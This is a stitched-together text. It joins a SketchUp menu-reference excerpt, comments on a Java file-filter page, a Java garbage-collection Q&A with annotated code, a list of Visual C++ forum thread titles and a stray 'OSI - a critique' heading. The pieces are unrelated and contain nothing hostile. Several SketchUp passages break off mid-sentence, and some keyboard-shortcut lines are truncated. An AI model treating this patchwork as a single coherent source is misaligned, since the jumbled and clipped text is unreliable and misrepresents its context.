Changes the orientation of several faces to match the selection.
SketchUp does a little guessing here to try and decide how you want the
faces oriented. Often it works just right. When it doesn't, you can
always use Undo and orient the faces one by one using Reverse
Faces.
Changes the view so the selected face fills the modeling window and is
entirely within the window.
Opens a group for editing.
Changes the entities in the selected group to individual entities no
longer grouped.
Turns a group into a component, with all the features of a
component.
Frees a group from being glued to another face in your model.
Changes a group that you've scaled back to its original
proportions.
Changes a group that you've skewed back to its original
proportions.
Creates intersections between the group and other entities in the
model. For more on intersections see the section called “Intersections in 3-D Objects”.
Flips a group along a selected axis (red, blue, or green). Flipping
doesn't create a mirror image of the group.
Changes the view so the selected group fills the modeling window and
is entirely within the window.
Opens a component for editing. Any changes made affect all other
instances of the component.
Makes a single instance of a component into a new, separate component.
The original component otherwise remains unchanged.
Makes the entities in a component into separate entities, no longer
contained in the component. The original component is still in the
Components window.
Frees a component from being glued to another face in your
model.
Updates the currently selected component with a version saved in your
computer's file system.
Saves a component as a new SketchUp document under a different name.
(You can also load any SketchUp document into any other SketchUp
document as a component; see the section called “Saving Components for Reuse”.)
Redefines the origin of the axes in the selected component. Other 3-D
programs sometimes refer to this as the local coordinate
system. You can use this command to align the component's
bounding box with the component's geometry, which helps prevent entities
from skewing awkwardly when scaled.
Changes back a component that you've scaled to its original
proportions.
Changes back a component that you've skewed to its original
proportions.
If the selected component has been scaled, choosing this option makes
that scale the correct scale for all instances of the component. Other
instances won't change in size, but they will have the option to Reset
Scale. SketchUp uses the newly defined scale definition for the
reset.
Creates intersections between the component and other entities in the
model. For more on intersections see the section called “Intersections in 3-D Objects”.
Flips a component along a selected axis (red, blue, or green).
Flipping isn't the same as creating a mirror image of the group.
Smoothes the edges adjoining two surfaces, making those two surfaces
look like a single curved surface. Opens the Soften Edges window, where
you can adjust the angle setting.
Changes the view so the selected component fills the
modeling window and is entirely within the window.
Opens the Component Options box for Dynamic Components.
Mac: Option-⌘-T
Opens a window with special characters like arrow and math symbols, which
you can use with SketchUp's 3D text tool.
Commands on the View menu mostly let you show and hide
different features in the modeling window. (The options that manage the angle
and orientation of your view of the modeling window are under the Camera
Shows and hides tool palettes. Windows and Mac handle tool palettes
differently. In Windows, this menu manages all tool options. Windows
toolbars can be docked or floating. To move toolbars, drag the handle on the
left side. Use the Large Buttons option to change the size of the button on
all the toolbars. PC toolbars include Getting Started, Large Tool Set,
Camera, Construction, Drawing, Face Style, Google, Layers, Measurements,
Modification, Principal, Sections, Shadows, View, Walkthrough, and Dynamic
Components.
On this menu, a Mac has three toolbars that you can show or hide: Large
Tool Set, Google, and Dynamic Components.
Mac tools are customized primarily using the Customize Toolbar command
(the section called “For Mac”).
Shows and hides scene tabs that appear at the top of the modeling
window.
Shows and hides entities that you've hidden using the Edit → Hide
command. This command also shows additional geometry in some entities like
smoothed surfaces.
Shows and hides the section plane used to create section cuts.
Shows and hides section cuts in the modeling window.
Shows and hides the red, green, and blue axes.
Shows and hides the guides you place in your model as references.
Shows and hides shadow effects.
Shows and hides fog effects.
The Edge Style view options show and hide different visual
effects applied to edges.
Shows and hides edges in the model.
Shows and hides the visual effect that increases the thickness of some
edges to enhance the three-dimensional appearance of models.
Shows and hides a visual effect that changes line thickness depending
on the distance from the camera.
A sketchy (the section called “Changing Edge Styles”) visual effect that
extends lines slightly beyond their endpoints, making the model look
hand drawn.
Changes the appearance of faces in your model. These options are also
available on the Face Style toolbar, which is usually a more convenient way
to access them.
Changes the transparency of faces so you can see through your model.
This option toggles on and off and can work in combination with any of
the other face styles.
Hides faces, leaving only edges visible.
Displays faces in the model without any shading or textures.
Faces display material but not textures.
Faces display both material and textures.
Displays faces without material effects using the default
material—usually white for front faces and blue for back
faces.
Displays and hides model entities relative to the selected
component.
Displays the selected component, but hides the other entities in the
modeling window.
Hides other instances of the selected component. This command comes in
handy when you're working on an array of components and need a less
cluttered view.
Controls features related to scenes and animations.
Mac: Option-⌘-+
Adds a new scene to the SketchUp document.
Mac: Option-⌘-
Updates the scene to match the current view.
Deletes the selected scene.
Windows: Page Up
Moves to the previous scene.
Windows: Page Down
Moves to the next scene.
Plays the animation.
Opens the animation settings in the Model Info window.
Hides the Mac toolbar at the top of the modeling window.
Used to display and hide specific tools in the Mac toolbar above the
modeling window. In Windows, the Tool Palettes command (the section called “For Windows”) performs similar functions.
In SketchUp, you view through a camera the three-dimensional world
where your model lives. Most of the commands on this menu set the position and
properties of that camera.
Changes the camera position and view to the immediately previous setup.
You can use Previous multiple times to step back through different views of
your model. Keep in mind, this isn't an Undo command, so your model doesn't
change as you step back, just your angle of view.
Used after using the Previous tool. Permits you to move forward again
through your camera views.
Lets you reposition the camera through which you view your model.
Mac: ⌘-1
Changes the camera to view the modeling window from the top.
Mac: ⌘-2
Changes the camera to view the modeling window from the bottom.
Mac: ⌘-3
Changes the camera to view the modeling window from the
front.
Mac: ⌘-4
Changes the camera to view the modeling
window from the back.
Mac: ⌘-5
Changes the camera to view the modeling window from the left.
Mac: ⌘-6
Changes the camera to view the modeling window from the right.
Mac: ⌘-7
Changes the camera to view the modeling window from an angle.
Changes the camera to view the modeling window without the converging
lines of the perspective views. This view can help with some alignment
chores. In other cases it can be confusing. In general the perspective views
provide a better sense of three dimensions and distance.
Creates a view where an object in the distance appears smaller than
objects close to the camera. SketchUp uses three-point perspective unless
you tell it otherwise (next).
Creates a view using two-point perspective, which has two vanishing points
instead of SketchUp's standard three-point perspective. This type of view is
similar to view cameras or lenses that correct parallax problems. While in
two-point perspective view you can use the Pan tool to change the view;
however, if you use the Orbit tool, the view changes back to
Perspective.
Opens a file browser window so you can bring a photo into SketchUp for
photo-matching; the Edit Matched Photo tools become available. Photo
matching makes it easier to create an accurate model from a photograph. For
details, see Chapter 10, Matching Your Photos in SketchUp.
Puts SketchUp in Photo Matching mode, giving you the tools to adjust the
modeling window so you can accurately create a model from a
photograph.
Windows: O
Mac: O; ⌘-B
Mouse shortcut: Drag while pressing the middle mouse button.
A camera movement tool that lets you move
around the 3-D modeling space in any direction. This tool is very useful for
readjusting your angle of view.
Windows: H
Mac: H; ⌘-R
Mouse shortcut: Press Shift as you drag with the middle mouse
button.
Displays a hand cursor that lets you drag the view of the modeling window
to change your view. Unlike a cinematic pan, where the camera pivots on a
tripod, this command actually changes the camera position.
Windows: Z
Mac: Z; ⌘-\
Mouse shortcut: Press Ctrl as you drag with the middle mouse
button.
Like the zoom lens on a camera, it gives you a closer or more distant view
in the modeling window.
The Zoom metaphor doesn't entirely hold up. The Zoom tools actually
move the camera position; they don't change the field of view, which is
what a camera's zoom lens does (for that, see the next command). Martin
Scorsese would have named this command "dolly."
The field of view is an angle measurement in degrees that describes how
much or how little of the modeling window the camera sees. You can use
degrees (deg), where larger numbers equal a greater view, or millimeters
(mm) for camera lens size, where larger numbers produce a narrower view.
Choose this command and SketchUp displays the field of view in the
Measurements toolbar. You can then type a new measurement—like
30 deg or 50mm—to
change the field of view.
Windows: Ctrl+Shift+W
Mac: ⌘-]
After choosing this command, drag a rectangular window on screen. SketchUp
changes the modeling window view to fit the area you mark.
Windows: Ctrl+Shift+E
Mac: ⌘-[
When chosen from the camera menu, Zoom Extents changes
the view to comfortably fit all the entities in the modeling window, which
is great for returning to a familiar view when you get lost in your model
(the section called “Introducing the Blue Axis”). When chosen from a
shortcut (right-click) menu, Zoom Extents fills the modeling window with the
selected entities, helping you to quickly focus on a specific entity.
If you've applied a photo to a scene's background as part of a Match Photo
session, this zooms the view until the photo fits entirely within the
view.
After choosing this command, click a surface or the SketchUp ground plane
to position the camera in a specific location.
Mac: ⌘-, (comma)
Lets you manually move the camera through your model (the section called “Looking Around”).
Mac: ⌘-. (period)
Use this command to pivot the camera horizontally and vertically around a
single point; it does the same thing as panning and tilting in motion
picture lingo.
Commands in the Draw menu fire up SketchUp's basic drawing
tools. Most of these tools use SketchUp's click-move-click drawing method. They
also let you use the Measurements toolbar to draw with great accuracy (the section called “A Tour of SketchUp's Main Window”).
Windows: L
Mac: L; ⌘-L
Activates the Line tool. To draw lines, click the starting
point, and then move the cursor and click the ending point.
Windows: A
Mac: A; ⌘-J
Activates the Arc tool. To draw arcs, click to create one starting point,
then move the cursor, and click to set the ending point for the line. Then
click a third time to create the curve of the arc.
Mac: ⌘-F
Activates the Freehand tool used for drawing irregular lines. The Freehand
tool is one of a few tools you drag. To use the Freehand tool, press the
mouse button as you trace a line in the modeling window.
Windows: R
Mac: R; ⌘-K
Activates the Rectangle tool. To draw a rectangle, click to set one corner
of the rectangle, and then click again to set the opposite corner.
Windows: C
Mac: C
Activates the Circle tool. To draw a circle, click to set the center of
the circle, and then click to set a point at the edge of the circle.
Mac: ⌘-;
Activates the Polygon tool. To create a Polygon, click to set a point for
the center, and then click to set a point on the edge of the polygon. To set
the number of sides, type the number of sides followed immediately by the
letter s. For example, 3s for a
triangle; 8s for an octagon. After selecting the
Polygon tool, you can type the number of sides before or immediately after
creating the polygon.
Sandbox tools let you model terrain and other organic shapes in SketchUp.
The design element used to create these shapes is referred to as a TIN or
triangulated irregular network.
To activate the sandbox tools, go to Window → Preferences
→ Extensions (SketchUp → Preferences →
Extensions) and turn on the Sandbox Tools checkbox.
Use From Contours to create a TIN from the contours formed by SketchUp
edges. Most often, these edges are created by using the Freehand
tool.
Creates a flat triangulated TIN that you can sculpt using sandbox
tools such as the Smoove tool (Tools → Sandbox →
Smoove).
The Tools menu holds most of the non-drawing tools, including the basic
Select, Move, Rotate, and Scale tools. You also find some of the tools that make
SketchUp unique, such as the Push/Pull, Follow Me, and Offset tools. Several of
these tools use the Measurements toolbar (the section called “A Tour of SketchUp's Main Window”) to perform their tasks with
accuracy.
Windows: Space bar
Mac: Space bar; ⌘-/
Activates the Select tool (and generally ends the operation of other
SketchUp tools). Often you must select a SketchUp entity before using other
tools or commands. For example, you must select several lines and edges
(entities) before making a group or component. Click an entity once to
select it. Click twice to select the entity and the other entities
immediately touching it. Click three times to select the entity and all the
entities that are connected to it by edges and faces.
You can drag to make a selection, but keep in mind that the Select
tool behaves differently depending on whether you drag it to the left or
to the right (the section called “Speeding Up Construction with Arrays”).
Drag to the right and the Select tool selects entities that are
completely within the selection window. Drag to the left to select every
entity that is partially within the selection window.
Windows: E
Mac: E
Activates the Eraser tool (the section called “Erasing Lines and Surfaces”).
Click entities to erase them, or drag to erase several entities at a time.
To hide an edge, press Shift while clicking the edge. To soften an edge
(making the angle less acute), press Ctrl (Option on a Mac) while clicking
the edge.
Windows: B
Mac: B
Activates the Paint Bucket tool (think B for bucket). Choose colors and
textures from the Materials window (Windows → Materials); then click
a face to paint it (the section called “Applying Colors and Materials (Windows)”). Press Alt (⌘ on a Mac), and the bucket turns into an eyedropper.
Click the eyedropper on faces with color or materials to load the Paint
Bucket tool with the color or material.
Windows: M
Mac: M; ⌘-0
Activates the Move tool (the section called “Moving, Copying, and Deleting Components”). Move edges, faces,
groups, or components using the click-move-click method. Click an entity,
and it becomes attached to the cursor. Move to a new location, and click to
place the entity. You can also use the Move tool to rotate groups and
components. Hold the Move tool over a group or component, and red crosses
appear at certain locations. Hold the cursor over a cross, and it displays
the Rotate cursor. Rotate the object using the techniques described for the
Rotate command (next). Toggle the Ctrl key (Option on a Mac) to put the Move
tool in copy mode. The original entity remains in place; a copy of the
entity is moved to the new location. You can move an entity with precision
by clicking the entity with the Move tool and then typing a distance. The
distance with a measurement, such as 4', appears in the
Measurements toolbar. Press Enter (Return), and the entity moves the
specified distance.
Windows: Q
Mac: Q; ⌘-8
Activates the Rotate tool (the section called “Rotating an Object”). The
cursor looks like a protractor and determines the plane of rotation. To
rotate entities, click one point, and the cursor displays a rubber band
line; click another point to set a temporary line. Then as you move the
cursor, the entity rotates around the first point you clicked. Click a third
and final time to complete the rotation. Toggle the Ctrl key (Option on a
Mac) to put the Rotate tool in copy mode. The original entity remains in
place; you rotate a copy of the entity into position.
Windows: S
Mac: S; ⌘-9
Activates the Scale tool. Click an entity, and a bounding box with handles
appears around the entity. Hold the Scale cursor over one of the handles,
and a tooltip appears explaining the effect of dragging that particular
handle. For example, a message may say "Blue Scale About Opposite Point",
meaning the object will be scaled along the blue axis.
Windows: P
Mac: P; ⌘-=
Activates the Push/Pull tool, which is used to extrude faces into
three-dimensional objects. Click a face and then move the cursor
perpendicular to the surface. You can also type a dimension to extrude a
face with precision. For example, type 4' after
clicking a face, and the face is extruded 4 feet.
Activates the Follow Me tool, which extrudes a profile along a path.
Select the path first, and then click the face or profile to extrude.
Windows: F
Mac: F; ⌘- –(hyphen)
Activates the Offset tool, which is used to offset the edges of a face
(the section called “Using the Offset Tool”). For example, the Offset tool
lets you create a perfectly proportioned rectangle inside of another
rectangle with just two clicks. Click the edge that you want to offset, and
then move the cursor and click again. The original edge remains in place and
a duplicate appears at the point of the second click.
Windows: T
Mac: T
Activates the Tape Measure tool, which is used both for measuring
distances and for setting guides in your modeling window (the section called “Making Construction Lines”). To measure, click a point, move
the cursor, and then click a second point. The distance appears in the
Measurements toolbar. To create a guide, click an edge or face in the
modeling window, move the cursor to a new location, and click again. A guide
appears as a dashed line in the modeling window. Use Ctrl (Option) to toggle
Guide mode on and off. Erase individual guide lines using the Eraser tool.
Choose Edit → Delete Guides to remove all the guides in your
document. To hide guides temporarily, go to View → Guides.
Use the Protractor tool to measure angles and create guides based on
angles. The process requires three clicks. The first click sets the
intersection of the angle, a second click defines one line, and the third
click defines the second line. The measurement is shown in degrees in the
Measurements toolbar. You can also use the protractor to create guides. The
Ctrl (Option) key toggles Guide mode on and off. Erase individual guide
lines by using the Eraser tool. Choose Edit → Delete Guides to
remove all the guides in your document. To hide guides temporarily, go to
View → Guides.
Use the Axes command to reposition the Origin in the modeling window and
to change the alignment of the three axes. The Origin is the point where the
red, blue, and green axes meet. After choosing the command, click a location
in the modeling window to move the Origin to the new point.
Activates the Dimensions tool, which lets you place dimension marks and
labels in your document. To display the dimension of an edge, click the edge
(avoiding mid- and endpoints), and then move the cursor perpendicular to the
edge. Dimension text and marks appear; click to set their position. To make
other measurements, click to set one point, and then click again to set a
second point. Move the cursor away from the line created to position the
dimension lines and text. You can change typeface, size, and marker styles
by choosing Window → Model Info → Text.
Activates the Text tool. Click the Text tool in the modeling window to
place a text box. Type the text you want. To edit previously placed text,
double-click the text. You can reposition text using the Move tool. Text
isn't placed in the 3-D world—it's as if you placed it on the camera
lens. For example, text remains in the same position in the modeling window
even when you use tools such as Orbit and Pan. To place text
in the context of the 3-D world, use the 3D Text tool described next.
Opens the Place 3D Text window. Type the text you want, and use the
settings to choose a typeface and to format the text. Click Place to close
the window when you're done, and then click in your modeling window to place
the text. The block of text is a component listed in the Components window
(Windows → Component). You can manipulate text in the modeling
window using the standard tools such as Move and Rotate.
Mac: ⌘-Y
Used to create cutaway views of your model. Objects on one side of the
plane are hidden. Click a point in your model to create a section plane
(the section called “View Cross-Sections with Section Planes”). You can
reposition section planes using the Move and Rotate tools.
The Google Earth commands help you coordinate your SketchUp modeling
activities with Google Earth tools.
Moves a Google Earth image into SketchUp. The most common use of this
command is to position a model accurately in terms of latitude and
longitude. SketchUp imports a black-and-white copy of the Google image
and orients it so that the green axis line points north.
Displays an image as terrain and indicates the elevations, after you
import a Google Earth image into SketchUp.
Sends your model to Google Earth by creating a temporary file of your
model and placing it in the proper location in Google Earth. You use
this technique primarily while modeling (the section called “Exporting 3-D Images”). You can remove models from Google
Earth by right-clicking the model name in the Places (or Temporary
Places) folder and then choosing Delete.
Lets you manipulate dynamic models in SketchUp. For example, a door or
window may open and close when you click it with the Interact tool.
Sandbox tools let you model terrain and other organic shapes inside of
SketchUp. The design element used to create these shapes is referred to as a
TIN or triangulated irregular network. TINs are
automatically stored in groups, so you must double-click the shape before
editing.
Sculpts terrain or organic shapes formed by a TIN. The Smoove tool
highlights the area to be changed. After activating the Smoove tool, you
can adjust the area affected by the Smoove tool by typing a radius like
20'. The number appears in the Measurements
toolbar, and the size of the highlight changes accordingly.
Use the Stamp tool to create impressions on the TIN by "pressing"
geometry into the surface.
Lets you project edges (lines) over the irregular surface of a
TIN.
Subdivides certain areas of the TIN, made up of lots of small
triangles, into even smaller triangles. You can then sculpt finer
details. It also adds to the complexity of your SketchUp model.
Lets you manually make adjustments to the TIN. It's particularly
useful when unwanted flat areas appear in terrain developed from contour
lines.
SketchUp's extensive Windows menu is used to open windows where you manage
your model and its features like components, styles, layers, and scenes. You do
a lot of your SketchUp project management and fine-tuning in some of these
windows. The options under the Windows menu are slightly different in
Windows and on a Mac.
Mac: ⌘-M
Hides the active SketchUp modeling window. You can show the window again
by clicking its icon in the Dock.
Expands (or shrinks) the size of the SketchUp modeling window
onscreen.
Mac: Shift-⌘-I
Opens the Model Info window, where you can change settings related to your
model. General categories for these settings are Animation, Components,
Credits, Dimensions, File, Location, Rendering, Statistics, Text, and
Units.
Mac: ⌘-I
Opens the Entity Info window, where you can change settings related to the
selected entity. (An entity may be a single edge or face, a selection of
edges and faces, or a group or complex component.) Use the Entity Info box
to manage layers, show and hide entities, and manage shadow behavior. Entity
Info is always available from a shortcut menu by right-clicking.
Mac: Shift-⌘-C
Opens the Materials window, where you manage and edit materials and colors
that are applied to faces in your model.
Use the Components window to manage the components in your model. The
Search feature gives you direct access to the 3D Warehouse (the section called “Placing Components in Your Model”), where you find thousands
of SketchUp components that are ready to use. The Edit tab lets you change
the alignment or glue-to settings for your components (the section called “Saving Components for Reuse”). The Statistics tab gives you a
running list of the entities and elements inside of a component.
Opens the Styles window, where you manage the appearance of your SketchUp
model. With a click of a button, you can dramatically change the appearance
of the edges and faces in your model.
Layers (the section called “Working with Layers”) are a way to show and hide
portions of your SketchUp model. The Layers window lets you add and remove
layers and control their visibility.
Opens the Outliner, where you can manage your model's groups and
components. The Outliner lets you name and create nested groups and
components. It's also a handy way to find groups and components that have
been hidden using the Hide command. You can access the shortcut menu for any
group or component by right-clicking its name in the Outliner.
Use the Scenes window to create, update, and remove scenes from your
document. By reordering scenes in the list, you can change their order in
animations. You can save or update specific visual properties in your scenes
such as camera location, hidden geometry, visible layers, section planes,
style and fog, shadow settings, and axes location.
Mac: ⌘-T
Opens the standard Mac Fonts window used to specify typeface and font
size.
Opens the Shadow Settings window used to show or hide shadows. You can use
the Time and Date settings to control the angle of shadows. The Light and
Dark slider controls let you fine-tune the appearance of shadows.
Opens the Fog window, where you can show or hide fog in the SketchUp
modeling window. Settings in the window let you control the intensity and
appearance of the fog effect.
Starts the Match Photo process (the section called “How Photo Match Works”),
which lets you bring photos in the SketchUp modeling window and then arrange
the view so you can accurately create a 3-D model using the photo for
reference points.
Changes the appearance and angle of the selected edges in your
model.
Displays a few basic, animated tutorials for SketchUp.
In Windows, this option opens the Preferences window, where you can adjust
some of the settings for SketchUp including the Template that SketchUp uses
when it starts a new document. On the Mac, you find this information under
SketchUp → Preferences. Other preferences include:
Location of files and libraries
Creation and timing of backups
Management of shortcut keys
Resolution of imported textures
Use of graphics card acceleration
Management of SketchUp extensions
Selection of an application to edit 2-D images
Hides some of the open windows and dialog boxes. (Oddly, this doesn't seem
to hide all of the open dialog boxes.)
Opens the Ruby Console, used to create and load add-on programs for
SketchUp—a topic not covered in this book.
Displays, in the Component Options window, details related to dynamic
components. Component developers may make some properties available to
designers using the component (the section called “Exploring the Components Window”). For example, a fence
component may let users change the height of the fence and the style of the
fence boards.
Opens the Component Attributes window, which displays spreadsheet-type
settings that you use to develop dynamic components.
Brings all open SketchUp windows to the foreground.
Displays the names of all the open modeling windows at the bottom of the
Windows menu. This system lets you jump back
and forth between models using menu commands.
All roads on the Help menu lead to Google one way or another. The
most helpful option in the bunch is the Online Help Center.
Opens the welcome window that you see when you first fire up SketchUp.
Turn off the "Always show on startup" checkbox if you don't want to see the
"Welcome to SketchUp" window every time you start SketchUp.
Takes you to SketchUp's web-based help system (the section called “SketchUp Help Center”). The advantage of having this system
on the Web is that Google can easily upgrade the help services. The
disadvantage is that you must have an Internet connection to get to the help
system. Online you find tutorials, videos, PDF documents, and user
forums.
Opens a window where you can provide feedback to Google and get
installation help. If you've purchased SketchUp Pro, you can receive
technical support.
Use the License menu options to activate and deactivate your SketchUp
license. (On the Mac, you find this information under SketchUp →
License.)
Quickly searches the Web to see if a newer version of SketchUp is
available. (On the Mac, you find this link under SketchUp → Check
for Web Updates.)
The About window displays information about your version of SketchUp and a
few links where you can get information, help, and license details. (On the
Mac, you find this information under SketchUp → About
SketchUp.)
If you enjoyed this excerpt, buy a copy of Google SketchUp: The Missing Manual.
Filter Files in Java
Introduction
The Filter File Java example code provides the following functionalities:
Filtering the files depending on the file
Thanks for the code - Binu, July 5, 2012 at 2:18 PM
The above code works well. Thanks
happyhahaaa - July 24, 2012 at 9:28 AM
are u ?
I need more AI code in java - Akhaumere Allen, April 28, 2013 at 11:28 PM
My project requires AI algorithm code: programs like filter, sorting, search, etc. I will be glad if you can keep updating me with these codes.
Hi, I am going through SCJP material and I have a doubt regarding a question I came across in that material.
Yes the answer is B alright.
Here is how it is:
Let us say A1 is the object referenced by a1 and A2 is the one referenced by a2. Similarly, B1 for b1 and B2 for b2.
a1.b1 and a2.b1 refer to the same static field, so even when a1 = null, a2.b1 still holds a reference to B1.
And a2.b2 = b2 holds the reference to the object B2.
So only A1 has no reference (A2 is referenced by a2).
Thus only A1 is eligible for garbage collection.
Hi Pradeep, Thanks for your reply
Here, a2.b1 = b1 is never assigned in the code. But still, since a1.b1 is static and is made to point to b1 (the object B1), are you saying that b1 will stay alive until the class ends?
I can understand the reason why the object of b2 will stay alive, since a2.b2 is made to point to it.
Thanks
Code is hard to read. Following is broken down with comments that explain each reference.
class Beta { }

class Alpha {
    static Beta b1; // Reference X1
    Beta b2;        // Reference X2
}

public class Tester {
    public static void main(String[] args) {
        Beta b1 = new Beta();   // Reference Y1 - Instance 1
        Beta b2 = new Beta();   // Reference Y2 - Instance 2
        Alpha a1 = new Alpha(); // Reference Y3 - Instance 3
        Alpha a2 = new Alpha(); // Reference Y4 - Instance 4
        a1.b1 = b1; // Reference X1 set to Instance 1
        a1.b2 = b1; // Reference Y3.X2 set to Instance 1
        a2.b2 = b2; // Reference Y4.X2 set to Instance 2
        a1 = null;  // Reference Y3 clear
        b1 = null;  // Reference Y1 clear
        b2 = null;  // Reference Y2 clear
        // At this point there are 4 instances.
        // Result:
        // Y4 is still set, thus Instance 4 is still referenced.
        // Y4.X2 is still set, thus Instance 2 is still referenced.
        // X1 is still set, thus Instance 1 is still referenced.
        // In the above, 3 instances are still referenced.
        // Thus there is one instance, Instance 3, which is eligible.
        // do stuff
    }
}
Yes, that's right... the class memory is shared by all of its objects, so a1.b1 is the same as a2.b1.
C++ Standards, Extensions, and Interop announcement
- Sticky0Votes
Visual Studio 2010 Service Pack 1 and Windows SDK for Windows 7, .NET Framework 4 and X64/IA64 Visual C++ Compilers Issue: Microsoft has identified an issue for users of the ... 0 Replies | 14715 Views | Created by Yi Feng Li - Wednesday, March 09, 2011 3:08 AM
- Sticky0Votes
High quality, low static: An answering "HOW-TO"So you've decided to contribute in the C++ forums. First of all: Thanks! High quality input is always welcome, and nothing is better than fresh blood (with fresh ideas and solutions). Now that you've ...
- Sticky0Votes
Visual C++ Language forum: The scope, tips and pointersWelcome to the Visual C++ Language forum! The scope of this forum is the C++ language, compiler and linker, and also covers all ...
- Sticky5Votes
Welcome to the Visual C++ Language ForumGreetings, This forum was created to address questions about writing code in C++. Visual C++ supports several programming language standards including the following: C - ISO C90 with ...0 Replies | 29400 Views | Created by Brandon Bray - Wednesday, May 18, 2005 8:39 PM
- Proposed1Votes
VS2013 C++ MFC: how to read a text file?Hello, I have previously used fstream member ifstream to open and read a text file in VS2003 (v.7) C++ MFC. This utilized a CString parameter from CFileDialog, as follows: CFileDialog ldFile(TRUE); if ...16 Replies | 138 Views | Created by JackCSB - Wednesday, March 05, 2014 7:47 PM | Last reply by WayneAKing - a few seconds ago
- Answered6Votes
Visual c++ load .ini files to comboboxI create pop up program for my company, I use Visual c++ CLR. I use .ini files for load and write data in my program. example data .ini files is ...13 Replies | 196 Views | Created by ray2091 - Tuesday, February 25, 2014 9:34 AM | Last reply by ray2091 - 1 hour 24 minutes ago
- Unanswered0Votes
LDAP Authenication On a Spring based WebPagehi, I have a webpage. This webpage is to authenticate customers to give permission access to access internet (like proxy server). This web page is developed ...1 Replies | 59 Views | Created by Ajvad Rahman - Thursday, March 06, 2014 8:57 AM | Last reply by May Wang - MSFT - 4 hours 18 minutes ago
- Answered1Votes
Is There Any Message Sent To Window When It Loses Focus?Is There Any Message Sent To Window When It Loses Focus ? It No Then How To Know When Window Loses Its Focus ?1 Replies | 38 Views | Created by Z_4412 - 8 hours 27 minutes ago | Last reply by Igor Tandetnik - 7 hours 50 minutes ago
- Answered0Votes
Copy symantics for a native dll referenceAdd Reference). The native dll shows up, correctly, as a reference, and I can make sure the "Copy" attribute is set to true. But in the end it the native dll isn't copied. I've ...3 Replies | 3783 Views | Created by GordonTWatts - Monday, February 14, 2011 5:51 AM | Last reply by Bull Earwig - 13 hours 41 minutes ago
- Unanswered0Votes
Getting 100 Errors when trying to compile wdm.h/*++ BUILD Version: 0162 // Increment this if a change has global effects Copyright (c) Microsoft Corporation. All rights ...4 Replies | 65 Views | Created by plasma33 - Thursday, March 06, 2014 8:30 AM | Last reply by Viorel_ - 13 hours 48 minutes ago
- Unanswered0Votes
"ref class or value class"Hi Igor and everybody Can you please tell me when "ref class" or "ref value" is used and what they are. If you could give me simple examples, I would appreciate ...1 Replies | 53 Views | Created by chong kyong kim - 17 hours 52 minutes ago | Last reply by Mike Danes - 17 hours 10 minutes ago
- Unanswered0Votes
map problemHi,all, I am using a map store a number of <int, vector<MSXML2::IXMLDOMNodePtr> elements, like this: map<int, vector<MSXML2::IXMLDOMNodePtr>> ...0 Replies | 44 Views | Created by daiyueweng - 17 hours 57 minutes ago
- Unanswered0Votes
open network file, network utilization is very highHi Guys, When I tried to open a network file, I noticed that network utilization is very high, It seems transfer whole file over network while open the file. I have a mapped network ...4 Replies | 70 Views | Created by dxaw2000 - Thursday, March 06, 2014 2:28 AM | Last reply by Vegan Fanatic - 20 hours 46 minutes ago
- Answered1Votes
Which Message Is Sent To Windows When It Is Overlapped By Other Window ?Which Message Is Sent To Windows When It Is Overlapped By Other Window ?2 Replies | 51 Views | Created by Z_4412 - Thursday, March 06, 2014 8:13 AM | Last reply by Mike Danes - Thursday, March 06, 2014 9:46 AM
- Unanswered0Votes
dwDesiredAccess in CreateFile ?Hello Experts: When I use CreateFile to open a handle to a USB device, the API succeeded if I use 0 as the parameter "dwDesiredAccess"; it failed with "Access ...3 Replies | 132 Views | Created by PolarisEt - Sunday, March 02, 2014 8:07 PM | Last reply by May Wang - MSFT - Thursday, March 06, 2014 7:59 AM
- Answered0Votes
Calling the available networks dialog in windows 8I'm using a custom shell application written in c# and I'm attempting to call the view available networks dialog box in windows 8, I have a working example for windows 7. The bar in question ...2 Replies | 111 Views | Created by Andrew J Morgan - Tuesday, February 25, 2014 10:19 AM | Last reply by May Wang - MSFT - Thursday, March 06, 2014 2:26 AM
- Unanswered0Votes
Checking if Windows SystemRestore is enabled/disabled in C++ using WMIGet(L"RPSessionInterval", 0, &vtProp, &cimtype, 0); returns vpProp as VT_NULL and cimtype as 0x13(CIM_UINT32). Now, cimtype is proper and msdn says that if VT_NULL is ...1 Replies | 57 Views | Created by priyeshwadhwa - Wednesday, March 05, 2014 10:03 AM | Last reply by Renjith V Ramachandran - Wednesday, March 05, 2014 1:02 PM
- Answered1Votes
C++ need helpthe "f" for female is not being recognized so it is not outputting what it should and also the count statement is giving out an incorrect format could someone give me some pointers as ...10 Replies | 114 Views | Created by d100man - Tuesday, March 04, 2014 4:19 PM | Last reply by davewilk - Tuesday, March 04, 2014 9:16 PM
- Answered1Votes
How do I remove the External Dependencies folder from a library project?Hi, How do I remove the External Dependencies folder from a library project? I have multiple copies of a include file that I wish not to ...14 Replies | 5408 Views | Created by williamj8 - Saturday, September 18, 2010 1:19 AM | Last reply by mileskilometers - Tuesday, March 04, 2014 6:39 PM
- Unanswered0Votes
C++ programhi im new virtually new to c++ and i have been asked to designed a program that would do the following : Write a program that will interview 10 persons who wants to join ...5 Replies | 95 Views | Created by d100man - Tuesday, March 04, 2014 2:25 AM | Last reply by Pavel A - Tuesday, March 04, 2014 11:11 AM
- Proposed0Votes
Runtime Error - Microsoft Visual C++ Runtime LibraryEach time I login to my Windows Server 2012 machine, after few minutes I keep getting the Runtime Error, even if I close the dialog box, it keeps repeating for 3-4 times. Below ...1 Replies | 57 Views | Created by Vishwanath Uppala - Tuesday, March 04, 2014 5:54 AM | Last reply by Bordon - Tuesday, March 04, 2014 6:10 AM
- Unanswered0Votes
debugger not debuggingVisual Studio 2010 ... why the hell does the debugger not stop the execution of a program and show me an error when I have an access violation in a dll? We call a function of a dll, there we get an ...9 Replies | 114 Views | Created by Rudolf Meier - Monday, March 03, 2014 10:35 AM | Last reply by SimonRev - Tuesday, March 04, 2014 3:00 AM
- Unanswered0Votes
Ponter on char array code compile but does not runI am trying to run this code but it does not work. Kindly tell me whats the problem. The code is to reverse the string #include<iostream> using namespace ...5 Replies | 138 Views | Created by A.Zohra - Saturday, March 01, 2014 5:48 AM | Last reply by A.Zohra - Monday, March 03, 2014 6:29 AM
- Discussion0Votes
Access Violation without Memory LeakgetKey(ch)) { if( (ptr_to_current->test(0))->getX()==0) { moveTo(getX() - 2, getY()); } // user hit a key this tick! ...2 Replies | 161 Views | Created by Ly_Wang - Sunday, February 23, 2014 2:55 AM | Last reply by Jane Wang - MSFT - Monday, March 03, 2014 3:28 AM
OSI - a critique

